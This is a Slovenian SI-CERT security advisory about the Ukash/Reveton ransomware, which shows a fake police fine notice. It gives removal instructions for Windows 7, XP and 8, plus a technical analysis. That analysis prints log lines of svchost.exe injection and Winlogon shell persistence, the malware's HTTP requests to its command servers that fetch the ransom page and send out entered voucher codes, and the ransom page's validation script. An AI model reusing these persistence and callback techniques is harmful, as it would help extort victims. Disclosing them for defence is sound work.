Izberite jezik

SI-CERT 2012-13 / Ukash virus

09.10.2012

Opis

Virus Ukash (tudi Reveton, Urausy) od uporabnika zahteva plačilo globe pod pretvezo nelegalnega prenosa avtorsko zaščitenih vsebin. Uporabniku ob zagonu prikaže lažno sporočilo slovenske Policije, kjer se zahteva plačilo globe kot nadomestilo za storjene prekrške. V zadnjem času opažamo porast izsiljevanja na podoben način kot v primeru okužbe, le da se v tem primeru lažno obvestilo policije odpre tekom brskanja po spletnih straneh, ponavadi v povečanem oknu spletnega brskalnika čez cel zaslon. V tem primeru ne gre za okužbo, uporabniki morajo zgolj zapreti spletni brskalnik (ali zgolj zavihek) in ob naslednjem zagonu brskalnika ne smejo obnoviti seje brskalnika.

1

Analiza okužbe

Uporabnikov sistem se okuži s pregledovanjem spletnih strani, na katerih se nahaja podtaknjena koda (gre za t.i. napad v mimohodu, ang. Drive-By-Download). Slednja poskuša izkoristiti morebitne varnostne luknje v brskalniku za namestitev škodljive kode. V primeru uspešne okužbe se na okuženem sistemu ob zagonu prikaže opozorilno obvestilo. Hkrati proces tudi blokira druga dejanja, ki bi se izognila prikazu obvestila. Več primerov lažnih obvestil slovenske policije, ki jih prikažejo različne variante virusa, lahko najdete na spletni strani https://www.botnets.fr/index.php/Landings_SI.

V večini primerov, ki smo jih preučili na SI-CERTu, je do okužbe prišlo zaradi izkoriščanja ranljivosti v starih verzijah programskega paketa Java. Uporabnikom priporočamo, da namestijo zadnjo verzijo Jave in jo redno posodabljajo. Če Jave ne potrebujejo pa naj jo odstranijo preko Nadzorne plošče.

Odstranitev okužbe

Okužba onemogoča uporabo sistema oz. zaganjanje programov, odstrani pa se jo lahko na spodaj navedene načine. Obstaja več verzij virusa Ukash, na SI-CERT smo seznanjeni s šestimi različicami, ki so se dosedaj širile med slovenskimi uporabniki.

Odstranjevanje s pomočjo Microsoft Windows Defender Offline

Okužbo lahko odstranite z izdelavo zagonskega CD ali USB ključa, ki ga naredite s pomočjo programa Microsoft Windows Defender Offline. Na čistem računalniku si prenesite program iz Microsoftove spletne strani

http://windows.microsoft.com/sl-SI/windows/what-is-windows-defender-offline

Program na čistem računalniku zaženite in sledite navodilom. Ustvaril vam bo poseben zagonski CD ali USB ključ, ki ga vstavite v okužen računalnik in iz njega zaženite računalnik. Kako računalnik zaženete iz zagonskega CDja ali USBja je odvisno od modela računalnika, zato preučite navodila vašega računalnika. Če navodil nimate, si poskušajte pomagati z navodili na spletni strani

http://www.wikihow.com/Boot-a-Computer-from-a-CD

Ko se računalnik zažene iz zagonskega CDja, se na zaslonu pojavi obvestilo:

Press any key to boot from CD or DVD...

Pritisnite katerokoli tipko in računalnik se bo zagnal v posebnem okolju, v katerem bo antivirusni program preskeniral celoten disk in poskusil odstraniti okužbo. Ko vam ponudi možnosti skeniranja izberite popoln pregled računalnika. Tako pregledovanje lahko traja tudi več ur.

Ročno odstranjevanje

Ročno odstranjevanje je lahko hitrejše in pri njem ni potreben dostop do drugega računalnika z nameščenim Windows operacijskim sistemom. Za ročno odstranjevanje sledite spodnjim korakom.

Windows 7

1. Ponovno zaženite računalnik. Ob zagonu Windows sistema, tik preden se prikaže Windows logotip, pritisnite tipko “F8”. Če se vam prikaže Windows logotip ste prepozno pritisnili tipko F8, v tem primeru računalnik ugasnite in ponovno poskusite.

2. V meniju izberite “Safe Mode With Command Prompt” (Varni način z ukazno vrstico) in pritisnite Enter

3. Če se vam prikaže prijavno okno, se prijavite v sistem, nato pa počakajte, da se na zaslonu prikaže ukazna vrstica.

4a. V ukazno vrstico enega za drugim vpišite naslednje ukaze (za vsakim ukazom pritisnite tipko Enter):

cd %appdata%
dir /o:d /a

Zadnji ukaz vam prikaže seznam datotek, urejeno po času nastanka. Na desni strani v seznamu preverite, ali se na koncu nahaja datoteka z enim od spodnjih imen:

other.res
data.dat
cache.dat
AltShell.dat
skype.dat
msconfig.dat

Če da, jo izbrišite z ukazom »del« (delete). Npr. če najdete datoteko data.dat, jo izbrišete z ukazom:

del data.dat

in pojdite na tč. 5.

3

4b. Če v seznamu datotek ne najdete nobene od navedenih datotek, vpišite naslednje ukaze:

cd %appdata%
cd Microsoft
cd Windows
cd "Start Menu"
cd Programs
cd Startup
dir /o:d /a

Zadnji ukaz vam zopet prikaže seznam datotek, urejeno po času nastanka. V seznamu preverite, ali se na koncu nahaja datoteka ctfmon.lnk ali datoteka z dolgim imenom in podaljškom .lnk. Če da, jo izbrišite z ukazom »del«, npr.:

del ctfmon.lnk

V primeru, da ne najdete nobene od teh navedenih datotek, imate računalnik zelo verjetno okužen z novo varianto virusa. V tem primeru poskusite računalnik očistiti s pomočjo programa Microsoft Windows Defender Offline ali pa nas kontaktirajte da vam pošljemo nadaljnja navodila.

5. Ponovno zaženite računalnik, tako da vpišete spodnji ukaz in pritisnete Enter:

shutdown –r –t 0

6. Sistem preglejte s posodobljenim antivirusnim programom.

Če vam bo po zgornjih navodilih uspelo očistiti računalnik bomo zelo veseli, če nas o tem obvestite tako da nam pošljete el. sporočilo na cert@cert.si.

 

Windows XP

1. Ponovno zaženite računalnik. Ob zagonu Windows sistema, tik preden se prikaže Windows logotip, pritisnite tipko “F8”. Če se vam prikaže Windows logotip ste prepozno pritisnili tipko F8, v tem primeru računalnik ugasnite in ponovno poskusite.

2. V meniju izberite “Safe Mode With Command Prompt” (Varni način z ukazno vrstico) in pritisnite Enter.

3. Če se vam prikaže prijavno okno, se prijavite v sistem, nato pa počakajte, da se na zaslonu prikaže ukazna vrstica.

4a. V ukazno vrstico enega za drugim vpišite naslednje ukaze (za vsakim ukazom pritisnite tipko Enter):

cd %appdata%
dir /o:d /a

Zadnji ukaz vam prikaže seznam datotek, urejeno po času nastanka. Na desni strani v seznamu preverite, ali se na koncu nahaja datoteka z enim od spodnjih imen:

other.res
data.dat
cache.dat
AltShell.dat
skype.dat
msconfig.dat

Če da, jo izbrišite z ukazom »del« (delete). Npr. če najdete datoteko cache.dat, jo izbrišete z ukazom:

del cache.dat

in pojdite na tč.5.

4

4b. Če v seznamu datotek ne najdete nobene od navedenih datotek, vpišite naslednje ukaze:

cd %userprofile%
cd "Start Menu"
cd Programs
cd Startup
dir /o:d /a

Zadnji ukaz vam zopet prikaže seznam datotek, urejeno po času nastanka. V seznamu preverite, ali se na koncu nahaja datoteka ctfmon.lnk ali datoteka z dolgim imenom in podaljškom .lnk. Če da, jo izbrišite z ukazom »del«, npr.:

del ctfmon.lnk

V primeru, da ne najdete nobene od teh navedenih datotek, imate računalnik zelo verjetno okužen z novo varianto virusa. V tem primeru poskusite računalnik očistiti s pomočjo programa Microsoft Windows Defender Offline ali pa nas kontaktirajte da vam pošljemo nadaljnja navodila.

5. Ponovno zaženite računalnik, tako da vpišete spodnji ukaz in pritisnete Enter:

shutdown –r –t 0

6. Sistem preglejte s posodobljenim antivirusnim programom.

Če vam bo po zgornjih navodilih uspelo očistiti računalnik bomo zelo veseli, če nas o tem obvestite tako da nam pošljete el. sporočilo na cert@cert.si.

Windows 8/8.1

Sistemi Windows 8 in 8.1 imajo spremenjen postopek zagona v varni način. V večini primerov se tega ne da opraviti s pritiskom na tipko F8 med zagonom (1). V tem primeru zato uporabnikom svetujemo odstranitev okužbe, kot je opisano v razdelku “Odstranjevanje s pomočjo Microsoft Windows Defender Offline”.

 

Tehnična analiza okužbe (1. varianta)

Po zagonu zlonamerni program injecira kodo v proces svchost.exe:

12:03:41,2713843,"ttvke9443gcw8q7l.exe","1124","Process Create",
"C:\WINDOWS\explorer.exe","SUCCESS","PID: 2012, 
Command line: ""C:\WINDOWS\explorer.exe"""

12:03:42,5062334,"Explorer.EXE","1848","Process Create",
"C:\WINDOWS\system32\svchost.exe","SUCCESS","PID: 148, 
Command line: ""C:\WINDOWS\system32\svchost.exe"""

Nato se skopira v datoteko %userprofile%\Application Data\msconfig.dat (Windows XP) oz. %userprofile%\Appdata\Roaming\msconfig.dat (Windows 7), ter ustvari zagonski ključ v registru:

12:03:43,5709439,"svchost.exe","148","RegSetValue",
"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell",
"SUCCESS","Type: REG_SZ, Length: 144, Data: 
explorer.exe,C:\Documents and Settings\user\Application Data\msconfig.dat"

Poveže se na enega od spletnih strežnikov na domeni tdzzf.ru oz. cxcyp.su, od koder v zakodirani obliki prejme kodo spletne strani, kjer se nahaja besedilo, ki ga prikaže uporabniku:

GET /555657550A896FA373AC286F5D17EF074B954434DD0E32AC1C1B HTTP/1.1
User-Agent: Our_Agent
Host: tdzzf.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 08 Oct 2012 14:14:46 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny16
Cache-Control: public
Content-Disposition: attachment; filename=44456
Content-Transfer-Encoding: binary
Content-Length: 79618

Koda spletne strani je različna glede na lokacijo IP naslova okuženega računalnika. Npr. če je okužen sistem s slovenskim IP naslovom, spletni strežnik pošlje obvestilo slovenske policije, v primeru okužbe sistema z IP naslovom v ZDA pa spletni strežnik pošlje obvestilo FBI. Spletni strežnik verjetno pošilja lokalna sporočila tudi v primeru okužb računalnikov v drugih evropskih državah.

Spletna stran vsebuje javascript kodo, ki preverja pravilno sintakso vpisane ukash oz. paysafecard kode:

if(!(text.length != 0 && /^633718[0-9]{13}$/.test(text) && cval > 0) && 
type == 0){ fdialog('showerror', 'block', 0); return; }

if(!(text.length != 0 && /^0[0-9]{15}$/.test(text) && cval > 0) &&
type == 1){ fdialog('showerror', 'block', 0); return; }

Če je koda sintaktično pravilna, jo v zakriptani obliki sporoči na omenjena spletna strežnika s HTTP GET zahtevkom, npr.:

GET /555657550A896EC413A0E86F5D17EF074B9BG834E18970A1C1A3728CA184524B95C138CDB4E366ECADC7D078E2235213F08 
HTTP/1.1User-Agent: Our_Agent
Host: tdzzf.ru
Cache-Control: no-cache

Zaščita

Uporabnikom svetujemo, da v namen zaščite sistema redno nameščajo zadnje popravke operacijskega sistema, izbranega brskalnika, ter njegovih vtičnikov, predvsem programskega paketa Java. Hkrati naj se izogibajo izvajanju programske opreme neznanega izvora, saj lahko tudi slednja vsebuje škodljivo programsko opremo. Priporočamo tudi redno izvajanje varnostnih kopij sistema.

 

(1)

http://windows.microsoft.com/sl-si/windows-8/windows-startup-settings-including-safe-mode

http://www.7tutorials.com/5-ways-boot-safe-mode-windows-8-windows-81

 

 Zadnja posodobitev: 3.3.2014